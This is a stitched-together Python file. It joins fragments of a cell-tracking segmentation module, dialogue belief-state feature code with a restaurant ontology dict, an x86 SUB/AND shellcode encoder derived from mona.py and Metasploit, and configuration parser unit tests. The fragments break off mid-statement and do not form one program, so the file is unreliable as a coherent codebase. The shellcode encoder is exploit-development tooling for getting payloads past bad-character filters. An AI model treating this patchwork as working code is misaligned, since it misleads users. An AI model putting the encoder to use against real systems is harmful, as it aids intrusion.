        assert len(dispyNodeIps) == 0
        # let the base class compute features and predictions first ...
        super(ConflictingSegmentsProbabilityGenerator, self).fillTraxels(
            usePgmlink, ts, fs, dispyNodeIps, turnOffFeatures
        )
        # ... then annotate every traxel with its conflicting hypotheses
        self._findOverlaps()
def _findOverlaps(self):
"""
Check which objects are overlapping between the different segmentation hypotheses,
and store that information in every traxel.
"""
logger.info("Checking for overlapping segmentation hypotheses...")
t0 = time.time()
# find exclusion constraints
if self._useMultiprocessing:
# use ProcessPoolExecutor, which instanciates as many processes as there CPU cores by default
ExecutorType = concurrent.futures.ProcessPoolExecutor
logger.info("Parallelizing via multiprocessing on all cores!")
else:
ExecutorType = DummyExecutor
logger.info("Running on single core!")
jobs = []
progressBar = ProgressBar(stop=self.timeRange[1] - self.timeRange[0])
progressBar.show(increase=0)
with ExecutorType() as executor:
for frame in range(self.timeRange[0], self.timeRange[1]):
jobs.append(
executor.submit(
findConflictingHypothesesInSeparateProcess,
frame,
self._labelImageFilenames,
self._labelImagePaths,
self._labelImageFrameIdToGlobalId,
self._pluginPaths,
)
)
for job in concurrent.futures.as_completed(jobs):
progressBar.show()
frame, overlaps = job.result()
for objectId, overlapIds in overlaps.items():
if self.TraxelsPerFrame[frame][objectId].conflictingTraxelIds is None:
self.TraxelsPerFrame[frame][objectId].conflictingTraxelIds = []
self.TraxelsPerFrame[frame][objectId].conflictingTraxelIds.extend(overlapIds)
t1 = time.time()
logger.info("Finding overlaps took {} secs".format(t1 - t0))
def findGroundTruthJaccardScoreAndMapping(
self,
hypothesesGraph,
groundTruthSegmentationFilename=None,
groundTruthSegmentationPath=None,
groundTruthTextFilename=None,
groundTruthMinJaccardScore=0.5,
):
"""
Find the overlap between all objects in the given segmentations with the groundtruth,
and store that jaccard score in each traxel's features.
**Returns** a solution dictionary in our JSON format, which fits to the given hypotheses graph.
TODO: simplify this method!
Currently there are 4 different sets of IDs to reference nodes:
* the ground truth trackId
* a corresponding globalId (which is unique within a frame across different segmentation hypotheses)
* an objectId (which equals the labelId within one segmentation hypotheses)
* a globally unique UUID as used in the JSON files
The nodes in the hypotheses graph are indexed by (frame, globalId), the resulting dict must use UUIDs.
"""
logger.info("Computing Jaccard scores w.r.t. GroundTruth ...")
t0 = time.time()
# find exclusion constraints
if self._useMultiprocessing:
# use ProcessPoolExecutor, which instanciates as many processes as there CPU cores by default
ExecutorType = concurrent.futures.ProcessPoolExecutor
logger.info("Parallelizing via multiprocessing on all cores!")
else:
ExecutorType = DummyExecutor
logger.info("Running on single core!")
jobs = []
progressBar = ProgressBar(stop=self.timeRange[1] - self.timeRange[0])
progressBar.show(increase=0)
gtFrameIdToGlobalIdsWithScoresMap = {}
with ExecutorType() as executor:
for frame in range(self.timeRange[0], self.timeRange[1]):
jobs.append(
executor.submit(
computeJaccardScoresOnCloud,
frame,
self._labelImageFilenames,
self._labelImagePaths,
self._labelImageFrameIdToGlobalId,
groundTruthSegmentationFilename,
groundTruthSegmentationPath,
groundTruthMinJaccardScore,
self._pluginPaths,
)
)
for job in concurrent.futures.as_completed(jobs):
progressBar.show()
frame, scores, frameGtToGlobalIdMap = job.result()
for objectId, individualScores in scores.items():
self.TraxelsPerFrame[frame][objectId].Features["JaccardScores"] = individualScores
gtFrameIdToGlobalIdsWithScoresMap.update(frameGtToGlobalIdMap)
t1 = time.time()
logger.info("Finding jaccard scores took {} secs".format(t1 - t0))
# create JSON result by mapping it to the hypotheses graph
traxelIdPerTimestepToUniqueIdMap, _ = hypothesesGraph.getMappingsBetweenUUIDsAndTraxels()
detectionResults = []
for (
gtFrameAndId,
globalIdsAndScores,
) in gtFrameIdToGlobalIdsWithScoresMap.items():
detectionResults.append(
{
"id": traxelIdPerTimestepToUniqueIdMap[str(gtFrameAndId[0])][str(globalIdsAndScores[-1][0])],
"value": 1,
}
)
# read tracks from textfile
with open(groundTruthTextFilename, "r") as tracksFile:
lines = tracksFile.readlines()
tracks = [[int(x) for x in line.strip().split(" ")] for line in lines]
# order them by track start time and process track by track
tracks.sort(key=lambda x: x[1])
linkingResults = []
descendants = {}
missingLinks = 0
def checkLinkExists(gtSrc, gtDest):
# first check that both GT nodes have been mapped to a hypotheses
if gtSrc in gtFrameIdToGlobalIdsWithScoresMap:
src = (gtSrc[0], gtFrameIdToGlobalIdsWithScoresMap[gtSrc][-1][0])
else:
logger.warning("GT link's source node {} has no match in the segmentation hypotheses".format(gtSrc))
return False
if gtDest in gtFrameIdToGlobalIdsWithScoresMap:
dest = (gtDest[0], gtFrameIdToGlobalIdsWithScoresMap[gtDest][-1][0])
else:
logger.warning(
"GT link's destination node {} has no match in the segmentation hypotheses".format(gtDest)
)
return False
# then map them to the hypotheses graph
if not hypothesesGraph.hasNode(src):
logger.warning("Source node of GT link {} was not found in graph".format((gtSrc, gtDest)))
return False
if not hypothesesGraph.hasNode(dest):
logger.warning("Destination node of GTlink {} was not found in graph".format((gtSrc, gtDest)))
return False
if not hypothesesGraph.hasEdge(src, dest):
logger.warning("Nodes are present, but GT link {} was not found in graph".format((gtSrc, gtDest)))
return False
return True
def gtIdPerFrameToUuid(frame, gtId):
return traxelIdPerTimestepToUniqueIdMap[str(frame)][
str(gtFrameIdToGlobalIdsWithScoresMap[(frame, gtId)][-1][0])
]
# add links of all tracks
for track in tracks:
trackId, startFrame, endFrame, parent = track
if parent != 0:
descendants.setdefault(parent, []).append((startFrame, trackId))
# add transitions along track
for frame in range(startFrame, min(endFrame, self.timeRange[1])):
if not checkLinkExists((frame, trackId), (frame | |
list(belief['beliefs']['requested'].values())])
ret_vec = [0] * 5
if n_requested > 4:
n_requested = 4
ret_vec[n_requested] = 1.
return ret_vec
    def convert_joint_slot_b(self, belief):
        """
        Extracts the features for the joint vector of all the slots

        The returned vector is the concatenation of:
        * the joint probability that every informable slot is '**NONE**' (1 value)
        * the normalised top joint beliefs, built from products of the two largest
          non-zero probabilities of each informable slot (20 values)
        * a one-hot encoding of how many slots (capped at 4) have a best value
          that beats '**NONE**' (5 values)

        :param belief: The full belief state
        :return: The joint slot vector (1 + 20 + 5 = 26 values)
        """
        # ic340 note: this should probably be done with an rnn encoder
        if type(belief) == DialogueState.DialogueState:
            # unwrap the belief state of the currently active domain
            belief = belief.domainStates[belief.currentdomain]
        joint_beliefs = []
        joint_none = 1.
        # deep-copy so that deleting '**NONE**' below does not mutate the caller's
        # belief state (NOTE: this might be inefficient)
        informable_beliefs = [copy.deepcopy(belief['beliefs'][x]) for x in list(belief['beliefs'].keys()) if
                              x in self.slots]
        for i, b in enumerate(informable_beliefs):
            # accumulate the joint "no value anywhere" probability
            joint_none *= b['**NONE**']
            del b['**NONE**']  # should I put **NONE** prob mass to dontcare?
            # keep only the two largest non-zero probabilities, zero-padded to length 2
            informable_beliefs[i] = sorted([x for x in list(b.values()) if x != 0], reverse=True)[:2]
            while len(informable_beliefs[i]) < 2:
                informable_beliefs[i].append(0.)
        # cartesian product of the per-slot top-2 values gives the joint beliefs
        for probs in product(*informable_beliefs):
            joint_beliefs.append(np.prod(probs))
        # pad with -1 up to 20 entries before normalisation
        first_joint_beliefs = -np.ones(20)
        joint_beliefs = joint_beliefs[:20]
        len_joint_beliefs = len(joint_beliefs)
        first_joint_beliefs[:len_joint_beliefs] = joint_beliefs
        if sum(first_joint_beliefs) == 0:
            # degenerate case: fall back to a uniform distribution
            first_joint_beliefs = list(np.ones(len(first_joint_beliefs)) / len(first_joint_beliefs))
        else:
            first_joint_beliefs = list(np.array(first_joint_beliefs) / sum(first_joint_beliefs))  # why normalise?
        # number of slots which are not **NONE**
        n = 0
        for key in belief['beliefs']:
            if key in self.slots:
                none_val = belief['beliefs'][key]['**NONE**']
                top_val = np.max(
                    [belief['beliefs'][key][value] for value in list(belief['beliefs'][key].keys()) if value != '**NONE**'])
                if top_val > none_val:
                    n += 1
        # one-hot encoding of the count, capped at 4
        not_none = [0.] * 5
        if n > 4:
            n = 4
        not_none[n] = 1.
        return [joint_none] + first_joint_beliefs + not_none
def convert_slot_b(self, belief, slot):
"""
Extracts the slot features by padding the distribution vector with -1s.
:param belief: The full belief state
:return: The slot DIP vector
"""
if type(belief) == DialogueState.DialogueState:
belief = belief.domainStates[belief.currentdomain]
if self.sortbelief is True:
b = [belief['beliefs'][slot]['**NONE**']] + sorted(
[belief['beliefs'][slot][value] for value in list(belief['beliefs'][slot].keys()) if value != '**NONE**'],
reverse=True) # sorted values
else:
b = [belief['beliefs'][slot]['**NONE**']] + \
[belief['beliefs'][slot][value] for value in list(belief['beliefs'][slot].keys()) if value != '**NONE**'] # unsorted values
assert len(b) <= self.max_v -1, 'length of bstate ({}) is longer than self.max_v ({})'.format(len(b), self.max_v-1)
padded_b = -np.ones(self.max_v)
padded_b[0] = 0.
padded_b[1:len(b)+1] = b
return padded_b
def _get_val_dist_in_DB(self, slot):
# The entropy of the normalised histogram (|DB(s=v)|/|DB|) \forall v \in V_s
values = Ontology.global_ontology.get_informable_slot_values(self.domainString, slot)
entities = Ontology.global_ontology.entity_by_features(self.domainString, {})
val_dist = np.zeros(len(values))
n = 0
for ent in entities:
if ent[slot] != 'not available':
val_dist[values.index(ent[slot])] += 1
n += 1
return entropy(val_dist/n)
def get_test_beliefs():
b1 = {'beliefs': {'allowedforkids': {'**NONE**': 0.0,
'0': 0.0,
'1': 0.0,
'dontcare': 1.0},
'area': {'**NONE**': 1.0,
'alamo square': 0.0,
'amanico ergina village': 0.0,
'anza vista': 0.0,
'ashbury heights': 0.0,
'balboa terrace': 0.0,
'bayview district': 0.0,
'bayview heights': 0.0,
'bernal heights': 0.0,
'bernal heights north': 0.0,
'bernal heights south': 0.0,
'buena vista park': 0.0,
'castro': 0.0,
'cathedral hill': 0.0,
'cayuga terrace': 0.0,
'central richmond': 0.0,
'central sunset': 0.0,
'central waterfront': 0.0,
'chinatown': 0.0,
'civic center': 0.0,
'clarendon heights': 0.0,
'cole valley': 0.0,
'corona heights': 0.0,
'cow hollow': 0.0,
'crocker amazon': 0.0,
'diamond heights': 0.0,
'doelger city': 0.0,
'dogpatch': 0.0,
'dolores heights': 0.0,
'dontcare': 0.0,
'downtown': 0.0,
'duboce triangle': 0.0,
'embarcadero': 0.0,
'eureka valley': 0.0,
'eureka valley dolores heights': 0.0,
'excelsior': 0.0,
'financial district': 0.0,
'financial district south': 0.0,
'fishermans wharf': 0.0,
'forest hill': 0.0,
'forest hill extension': 0.0,
'forest knolls': 0.0,
'fort mason': 0.0,
'fort winfield scott': 0.0,
'frederick douglass haynes gardens': 0.0,
'friendship village': 0.0,
'glen park': 0.0,
'glenridge': 0.0,
'golden gate heights': 0.0,
'golden gate park': 0.0,
'haight ashbury': 0.0,
'hayes valley': 0.0,
'hunters point': 0.0,
'india basin': 0.0,
'ingleside': 0.0,
'ingleside heights': 0.0,
'ingleside terrace': 0.0,
'inner mission': 0.0,
'inner parkside': 0.0,
'inner richmond': 0.0,
'inner sunset': 0.0,
'inset': 0.0,
'jordan park': 0.0,
'laguna honda': 0.0,
'lake': 0.0,
'lake shore': 0.0,
'lakeside': 0.0,
'laurel heights': 0.0,
'lincoln park': 0.0,
'lincoln park lobos': 0.0,
'little hollywood': 0.0,
'little italy': 0.0,
'little osaka': 0.0,
'little russia': 0.0,
'lone mountain': 0.0,
'lower haight': 0.0,
'lower nob hill': 0.0,
'lower pacific heights': 0.0,
'malcolm x square': 0.0,
'marcus garvey square': 0.0,
'marina district': 0.0,
'martin luther king square': 0.0,
'mastro': 0.0,
'merced heights': 0.0,
'merced manor': 0.0,
'midtown terrace': 0.0,
'miraloma park': 0.0,
'mission bay': 0.0,
'mission district': 0.0,
'mission dolores': 0.0,
'mission terrace': 0.0,
'monterey heights': 0.0,
'mount <NAME>': 0.0,
'nob hill': 0.0,
'noe valley': 0.0,
'noma': 0.0,
'north beach': 0.0,
'north panhandle': 0.0,
'north park': 0.0,
'north waterfront': 0.0,
'oceanview': 0.0,
'opera plaza': 0.0,
'outer mission': 0.0,
'outer parkside': 0.0,
'outer richmond': 0.0,
'outer sunset': 0.0,
'outset': 0.0,
'pacific heights': 0.0,
'panhandle': 0.0,
'park merced': 0.0,
'parkmerced': 0.0,
'parkside': 0.0,
'pine lake park': 0.0,
'portola': 0.0,
'potrero flats': 0.0,
'potrero hill': 0.0,
'presidio': 0.0,
'presidio heights': 0.0,
'richmond district': 0.0,
'russian hill': 0.0,
'saint francis wood': 0.0,
'san francisco airport': 0.0,
'san francisco state university': 0.0,
'sea cliff': 0.0,
'sherwood forest': 0.0,
'showplace square': 0.0,
'silver terrace': 0.0,
'somisspo': 0.0,
'south basin': 0.0,
'south beach': 0.0,
'south of market': 0.0,
'st francis square': 0.0,
'st francis wood': 0.0,
'stonestown': 0.0,
'sunnydale': 0.0,
'sunnyside': 0.0,
'sunset district': 0.0,
'telegraph hill': 0.0,
'tenderloin': 0.0,
'thomas paine square': 0.0,
'transmission': 0.0,
'treasure island': 0.0,
'twin peaks': 0.0,
'twin peaks west': 0.0,
'upper market': 0.0,
'van ness': 0.0,
'victoria mews': 0.0,
'visitacion valley': 0.0,
'vista del monte': 0.0,
'west of twin peaks': 0.0,
'west portal': 0.0,
'western addition': 0.0,
'westlake and olympic': 0.0,
'westwood highlands': 0.0,
'westwood park': 0.0,
'yerba buena island': 0.0,
'zion district': 0.0},
'discourseAct': {'ack': 0.0,
'bye': 0.0,
'hello': 0.0,
'none': 1.0,
'repeat': 0.0,
'silence': 0.0,
'thankyou': 0.0},
'food': {'**NONE**': 0.0,
'afghan': 0.0,
'arabian': 0.0,
'asian': 0.0,
'basque': 0.0,
'brasseries': 0.0,
'brazilian': 0.0,
'buffets': 0.0,
'burgers': 0.0,
'burmese': 0.0,
'cafes': 0.0,
'cambodian': 0.0,
'cantonese': 1.0,
'chinese': 0.0,
'comfort food': 0.0,
'creperies': 0.0,
'dim sum': 0.0,
'dontcare': 0.0,
'ethiopian': 0.0,
'ethnic food': 0.0,
'french': 0.0,
'gluten free': 0.0,
'himalayan': 0.0,
'indian': 0.0,
'indonesian': 0.0,
'indpak': 0.0,
'italian': 0.0,
'japanese': 0.0,
'korean': 0.0,
'kosher': 0.0,
'latin': 0.0,
'lebanese': 0.0,
'lounges': 0.0,
'malaysian': 0.0,
'mediterranean': 0.0,
'mexican': 0.0,
'middle eastern': 0.0,
'modern european': 0.0,
'moroccan': 0.0,
'new american': 0.0,
'pakistani': 0.0,
'persian': 0.0,
'peruvian': 0.0,
'pizza': 0.0,
'raw food': 0.0,
'russian': 0.0,
'sandwiches': 0.0,
'sea food': 0.0,
'shanghainese': 0.0,
'singaporean': 0.0,
'soul food': 0.0,
'spanish': 0.0,
'steak': 0.0,
'sushi': 0.0,
'taiwanese': 0.0,
'tapas': 0.0,
'thai': 0.0,
'traditionnal american': 0.0,
'turkish': 0.0,
'vegetarian': 0.0,
'vietnamese': 0.0},
'goodformeal': {'**NONE**': 0.0,
'breakfast': 0.0,
'brunch': 0.0,
'dinner': 0.0,
'dontcare': 1.0,
'lunch': 0.0},
'method': {'byalternatives': 0.0,
'byconstraints': 0.0,
'byname': 0.9285714285714286,
'finished': 0.0,
'none': 0.0714285714285714,
'restart': 0.0},
'name': {'**NONE**': 0.0,
'a 16': 0.0,
'a la turca restaurant': 0.0,
'abacus': 0.0,
'alamo square seafood grill': 0.0,
'albona ristorante istriano': 0.0,
'alborz persian cuisine': 0.0,
'allegro romano': 0.0,
'amarena': 0.0,
'amber india': 0.0,
'ame': 0.0,
'ananda fuara': 0.0,
'anchor oyster bar': 0.0,
'angkor borei restaurant': 0.0,
'aperto restaurant': 0.0,
'ar roi restaurant': 0.0,
'arabian nights restaurant': 0.0,
'assab eritrean restaurant': 0.0,
'atelier crenn': 0.0,
'aux delices restaurant': 0.0,
'aziza': 0.0,
'b star bar': 0.0,
'bar crudo': 0.0,
'beijing restaurant': 0.0,
'bella trattoria': 0.0,
'benu': 0.0,
'betelnut': 0.0,
'bistro central parc': 0.0,
'bix': 0.0,
'borgo': 0.0,
'borobudur restaurant': 0.0,
'bouche': 0.0,
'boulevard': 0.0,
'brothers restaurant': 0.0,
'bund shanghai restaurant': 0.0,
'burma superstar': 0.0,
'butterfly': 0.0,
'cafe claude': 0.0,
'cafe jacqueline': 0.0,
'campton place restaurant': 0.0,
'canteen': 0.0,
'canto do brasil restaurant': 0.0,
'capannina': 0.0,
'capital restaurant': 0.0,
'chai yo thai restaurant': 0.0,
'chaya brasserie': 0.0,
'chenery park': 0.0,
'chez maman': 0.0,
'chez papa bistrot': 0.0,
'chez spencer': 0.0,
'chiaroscuro': 0.0,
'chouchou': 0.0,
'chow': 0.0,
'city view restaurant': 0.0,
'claudine': 0.0,
'coi': 0.0,
'colibri mexican bistro': 0.0,
'coqueta': 0.0,
'crustacean restaurant': 0.0,
'da flora a venetian osteria': 0.0,
'darbar restaurant': 0.0,
'delancey street restaurant': 0.0,
'delfina': 0.0,
'dong baek restaurant': 0.0,
'dontcare': 0.0,
'dosa on fillmore': 0.0,
'dosa on valencia': 0.0,
'eiji': 0.0,
'enjoy vegetarian restaurant': 0.0,
'espetus churrascaria': 0.0,
'fang': 0.0,
'farallon': 0.0,
'fattoush restaurant': 0.0,
'fifth floor': 0.0,
'fino restaurant': 0.0,
'firefly': 0.0,
'firenze by night ristorante': 0.0,
'fleur de lys': 0.0,
'fog harbor fish house': 0.0,
| |
'''
Sub encoder that is based on the Alphanum Encoder that is part of monay.py
and the Optimised Subencoder that is part of Metasploit
https://github.com/rapid7/metasploit-framework/blob/master//modules/encoders/x86/opt_sub.rb
https://github.com/corelan/mona
'''
import argparse
import binascii
import sys
import os
"""
For the type of encoder we are going to use, this is a list of characters that
will conflict with the bad character list
first, check if there are no bad char conflicts - AND eAX, SUB r8, SUB eAX, XOR r/m16/32, XOR r8, XOR eAX,
DEC eDX , DEC eBP, DEC eSI
PUSH eAX, PUSH eBP, POP eSP
"""
# Opcode bytes that this encoder may emit; if any of them appear in the user's
# bad-character list, the encoding scheme cannot be used as-is.
NOBADCHARS = "\x25\x2a\x2d\x31\x32\x35\x4a\x4d\x4e\x50\x55\x5c"
# Instruction dictionary: x86 mnemonic (and register operand where one is
# needed) -> single-byte opcode emitted by the encoder.
ASM_DICT = {
    'NOP':"\x90",   # used for 4-byte alignment padding
    'AND':{
        'EAX':"\x25"
    },
    'SUB':{
        'EAX':"\x2D"
    },
    'PUSH':{
        'EBP':"\x55",
        'ESP':"\x54",
        'EAX':"\x50",
        'EBX':"\x53",
        'ECX':"\x51",
        'EDX':"\x52",
        'EDI':"\x57",
        'ESI':"\x56"
    },
    'POP':{
        'ESP':"\x5C",
        'EAX':"\x58"
    }
}
def str2bool(v):
    '''
    Parse a human-friendly boolean flag value.
    Accepts actual bools as well as common yes/no spellings (case-insensitive);
    raises argparse.ArgumentTypeError for anything else.
    '''
    if isinstance(v, bool):
        return v
    lowered = v.lower()
    if lowered in ('yes', 'true', 't', 'y', '1'):
        return True
    if lowered in ('no', 'false', 'f', 'n', '0'):
        return False
    raise argparse.ArgumentTypeError('Boolean value expected.')
def find_opposit_bytes(char_list):
    '''
    Given a list of characters, find opposit bytes that
    when AND'd together equal 0.
    Returns the pair as two 8-hex-digit strings (each byte repeated 4 times);
    if no pair exists, the last candidate pair is returned after a failure message.
    '''
    hex1 = None
    hex2 = None
    for first in char_list:
        for second in char_list:
            # repeat each byte 4 times to form a 32-bit value
            hex1 = '{:02x}'.format(ord(first)) * 4
            hex2 = '{:02x}'.format(ord(second)) * 4
            if hex_str_to_int(hex1) & hex_str_to_int(hex2) == 0:
                print("[+] Opposite Values Founds (AND'ing Values): {} & {}".format(hex1, hex2))
                return (hex1, hex2)
    print("[-] Failed to find opposite values")
    return (hex1, hex2)
def prepare_shellcode(pShelcode):
    '''
    Align shellcode to a 4-byte boundary (padding with NOPs) and split it
    into reversed 4-byte (8 hex digit) chunks.

    :param pShelcode: shellcode as a list of single-character strings
    :return: list of 8-hex-digit chunk strings in reverse order, or None on failure
    '''
    rem = len(pShelcode) % 4
    # BUGFIX: nop_sled must exist even when no padding is needed; previously the
    # success message below raised a NameError for already-aligned shellcode.
    nop_sled = []
    if rem != 0:
        nop_sled = [ASM_DICT['NOP']] * (4 - rem)
        pShelcode = pShelcode + nop_sled

    # Verify that we are aligned now
    if (len(pShelcode) % 4) == 0:
        print("[+] Added {} nops to alight shellcode to 4 bytes".format(len(nop_sled)))
    else:
        print("[-] Shellcode is not 4 byte aligned, can't continue.")
        return None

    # get hex value from shellcode and break it into 4-byte chunks
    hex_str = bin2hex(pShelcode)
    chunks = hex2array(hex_str, size=8)
    reversed_chunks = chunks[::-1]

    print("\n[+] ======== Shellcode Broken into Chunks ======== ")
    print("[+] Number of chunks: {}".format(len(chunks)))
    print("[+] Chunks: {}".format(chunks))
    print("[+] Reversed Chunks: {}".format(reversed_chunks))
    return reversed_chunks
def process_inputfile(input_file):
    '''
    Read the first line of input_file and convert its escaped hex contents
    (\\x??\\x??...) into a list of raw bytes.
    '''
    with open(input_file, 'r') as handle:
        first_line = handle.readline().strip()
    return hex2bin(first_line)
def bin2hex(bin_bytes):
    '''
    Render each element of bin_bytes as two lowercase hex digits and
    concatenate them into a single string.
    '''
    return ''.join(format(ord(ch), '02x') for ch in bin_bytes)
def hex2array(hex_str, size=2):
    '''
    Split a string of hex digits into fixed-width chunks.

    :param hex_str: string of hex digits
    :param size: chunk width in characters, default 2 (one byte);
                 the final chunk may be shorter
    :return: list of chunk strings
    '''
    return [hex_str[start:start + size] for start in range(0, len(hex_str), size)]
def hex2bin(pattern):
    """
    Converts a hex string (\\x??\\x??\\x??\\x??) to real hex bytes

    Arguments:
    pattern - A string representing the bytes to convert

    Return:
    a list of single bytes, one per hex-digit pair
    """
    cleaned = pattern.replace("\\x", "").replace("\"", "").replace("\'", "")
    # pair up the remaining hex digits and decode each pair to one byte
    return [binascii.a2b_hex(hi + lo) for hi, lo in zip(cleaned[0::2], cleaned[1::2])]
def hex_str_to_int(input_str):
    """
    Converts a string with hex bytes to a numeric value

    :param input_str: hex digits, e.g. "deadbeef" (an optional "0x" prefix is accepted)
    :return: the integer value, or 0 when the input cannot be parsed
    """
    try:
        val_to_return = int(input_str, 16)
    except (TypeError, ValueError) as e:
        # only catch conversion errors (previously a bare Exception, which
        # could mask unrelated bugs); anything else should propagate
        val_to_return = 0
        print('Exception converting hex to int: {}'.format(e))
    return val_to_return
def to_hex(input_int):
    '''
    Render an integer as a zero-padded 8-digit lowercase hex string.
    '''
    return format(input_int, '08x')
def tohex(val, nbits=32):
    '''
    Convert an integer value to hex.
    Negative values are wrapped into their nbits-wide twos-complement
    representation; the output is always 8 hex digits wide.
    '''
    # masking with (2**nbits - 1) is the twos-complement wrap
    wrapped = val & ((1 << nbits) - 1)
    return format(wrapped, '08x')
def validatebadchars_enc(val1, val2, val3, badchars):
newvals = []
allok = 0
giveup = 0
type = 0
origval1 = val1
origval2 = val2
origval3 = val3
d1 = 0
d2 = 0
d3 = 0
lastd1 = 0
lastd2 = 0
lastd3 = 0
while allok == 0 and giveup == 0:
# check if there are bad chars left
charcnt = 0
val1ok = 1
val2ok = 1
val3ok = 1
while charcnt < len(badchars):
if (("{:02x}".format(int(val1)))in badchars):
val1ok = 0
if (("{:02x}".format(int(val2))) in badchars):
val2ok = 0
if (("{:02x}".format(int(val3))) in badchars):
val3ok = 0
charcnt = charcnt + 1
if (val1ok == 0) or (val2ok == 0) or (val3ok == 0):
allok = 0
else:
allok = 1
if allok == 0:
# try first by sub 1 from val1 and val2, and add more to val3
if type == 0:
val1 = val1 - 1
val2 = val2 - 1
val3 = val3 + 2
if (val1 < 1) or (val2 == 0) or (val3 > 126):
val1 = origval1
val2 = origval2
val3 = origval3
type = 1
if type == 1:
# then try by add 1 to val1 and val2, and sub more from val3
val1 = val1 + 1
val2 = val2 + 1
val3 = val3 - 2
if (val1 > 126) or (val2 > 126) or (val3 < 1):
val1 = origval1
val2 = origval2
val3 = origval3
type = 2
if type == 2:
# try by sub 2 from val1, and add 1 to val2 and val3
val1 = val1 - 2
val2 = val2 + 1
val3 = val3 + 1
if (val1 < 1) or (val2 > 126) or (val3 > 126):
val1 = origval1
val2 = origval2
val3 = origval3
type = 3
if type == 3:
# try by add 2 to val1, and sub 1 from val2 and val3
val1 = val1 + 2
val2 = val2 - 1
val3 = val3 - 1
if (val1 > 126) or (val2 < 1) or (val3 < 1):
val1 = origval1
val2 = origval2
val3 = origval3
type = 4
if type == 4:
if (val1ok == 0):
val1 = val1 - 1
d1 = d1 + 1
else:
# now spread delta over other 2 values
if (d1 > 0):
val2 = val2 + 1
val3 = origval3 + d1 - 1
d1 = d1 - 1
else:
val1 = 0
if (val1 < 1) or (val2 > 126) or (val3 > 126):
val1 = origval1
val2 = origval2
val3 = origval3
d1 = 0
type = 5
if type == 5:
if (val1ok == 0):
val1 = val1 + 1
d1 = d1 + 1
else:
# now spread delta over other 2 values
if (d1 > 0):
val2 = val2 - 1
val3 = origval3 - d1 + 1
d1 = d1 - 1
else:
val1 = 255
if (val1 > 126) or (val2 < 1) or (val3 < 1):
val1 = origval1
val2 = origval2
val3 = origval3
val1ok = 0
val2ok = 0
val3ok = 0
d1 = 0
d2 = 0
d3 = 0
type = 6
if type == 6:
if (val1ok == 0):
val1 = val1 - 1
# d1=d1+1
if (val2ok == 0):
val2 = val2 + 1
# d2=d2+1
d3 = origval1 - val1 + origval2 - val2
val3 = origval3 + d3
if (lastd3 == d3) and (d3 > 0):
val1 = origval1
val2 = origval2
val3 = origval3
giveup = 1
else:
lastd3 = d3
if (val1 < 1) or (val2 < 1) or (val3 > 126):
val1 = origval1
val2 = origval2
val3 = origval3
giveup = 1
# check results
charcnt = 0
val1ok = 1
val2ok = 1
val3ok = 1
val1text = "OK"
val2text = "OK"
val3text = "OK"
while charcnt < len(badchars):
if (val1 == badchars[charcnt]):
val1ok = 0
val1text = "NOK"
if (val2 == badchars[charcnt]):
val2ok = 0
val2text = "NOK"
if (val3 == badchars[charcnt]):
val3ok = 0
val3text = "NOK"
charcnt = charcnt + 1
if (val1ok == 0) or (val2ok == 0) or (val3ok == 0):
print(" ** Unable to fix bad char issue !")
print(" -> Values to check : %s(%s) %s(%s) %s(%s) " % (
bin2hex(origval1), val1text, bin2hex(origval2), val2text, bin2hex(origval3), val3text))
val1 = | |
50)
config_object = JsonObject(content={"foo": 100})
config._Configuration__verify_or_set_optional_int(
config_object=config_object,
field="foo",
default_value=None,
config_description=None,
min_value=10,
max_value=100,
)
self.assertEqual(config_object["foo"], 100)
# 2. value < min
config_object = JsonObject(content={"foo": 9})
expected_msg = 'Got invalid value "9" for field "foo". Value must be greater than or equal to 10'
self.assertRaisesRegexp(
BadConfiguration,
expected_msg,
config._Configuration__verify_or_set_optional_int,
config_object=config_object,
field="foo",
default_value=None,
config_description=None,
min_value=10,
max_value=100,
)
# 3. value > max
config_object = JsonObject(content={"foo": 101})
expected_msg = 'Got invalid value "101" for field "foo". Value must be less than or equal to 100'
self.assertRaisesRegexp(
BadConfiguration,
expected_msg,
config._Configuration__verify_or_set_optional_int,
config_object=config_object,
field="foo",
default_value=None,
config_description=None,
min_value=10,
max_value=100,
)
def test___verify_or_set_optional_string_with_valid_values(self):
config = self._create_test_configuration_instance()
# 1. Valid value
config_object = JsonObject(content={"foo": "bar"})
config._Configuration__verify_or_set_optional_string(
config_object=config_object,
field="foo",
default_value=None,
config_description=None,
valid_values=["bar", "baz"],
)
self.assertEqual(config_object["foo"], "bar")
# 2. Not a valid value
config_object = JsonObject(content={"foo": "invalid"})
expected_msg = (
'Got invalid value "invalid" for field "foo". Valid values are: bar, baz'
)
self.assertRaisesRegexp(
BadConfiguration,
expected_msg,
config._Configuration__verify_or_set_optional_string,
config_object=config_object,
field="foo",
default_value=None,
config_description=None,
valid_values=["bar", "baz"],
)
def test_max_send_rate_enforcement_legacy_defaults(self):
self._write_file_with_separator_conversion(
""" {
api_key: "hi",
max_send_rate_enforcement: "legacy"
}
"""
)
config = self.get_configuration()
config.parse()
self.assertEquals(config.max_send_rate_enforcement, "legacy")
self.assertIsNone(config.parsed_max_send_rate_enforcement)
self.assertEquals(config.max_allowed_request_size, 1048576)
self.assertEquals(config.pipeline_threshold, 1.1)
self.assertEquals(config.min_request_spacing_interval, 1.0)
self.assertEquals(config.max_request_spacing_interval, 5.0)
self.assertEquals(config.max_log_offset_size, 5242880)
self.assertEquals(config.max_existing_log_offset_size, 104857600)
def test_disable_max_send_rate_enforcement_overrides(self):
self._write_file_with_separator_conversion(
""" {
api_key: "hi",
disable_max_send_rate_enforcement_overrides: true
}
"""
)
config = self.get_configuration()
config.parse()
self.assertEquals(config.max_send_rate_enforcement, "unlimited")
self.assertIsNone(config.parsed_max_send_rate_enforcement)
self.assertEquals(config.max_allowed_request_size, 1048576)
self.assertEquals(config.pipeline_threshold, 1.1)
self.assertEquals(config.min_request_spacing_interval, 1.0)
self.assertEquals(config.max_request_spacing_interval, 5.0)
self.assertEquals(config.max_log_offset_size, 5242880)
self.assertEquals(config.max_existing_log_offset_size, 104857600)
def test_max_send_rate_enforcement_overrides(self):
self._write_file_with_separator_conversion(
""" {
api_key: "hi",
max_allowed_request_size: 1234,
pipeline_threshold: 0.3,
min_request_spacing_interval: 3.0,
max_request_spacing_interval: 4.0,
max_log_offset_size: 1234,
max_existing_log_offset_size: 1234
}
"""
)
config = self.get_configuration_with_logger()
config.parse()
self.assertEquals(config.max_send_rate_enforcement, "unlimited")
self.assertIsNone(config.parsed_max_send_rate_enforcement)
self.assertEquals(config.max_allowed_request_size, 5900000)
self.assertEquals(config.pipeline_threshold, 0)
self.assertEquals(config.min_request_spacing_interval, 0.0)
self.assertEquals(config.max_request_spacing_interval, 5.0)
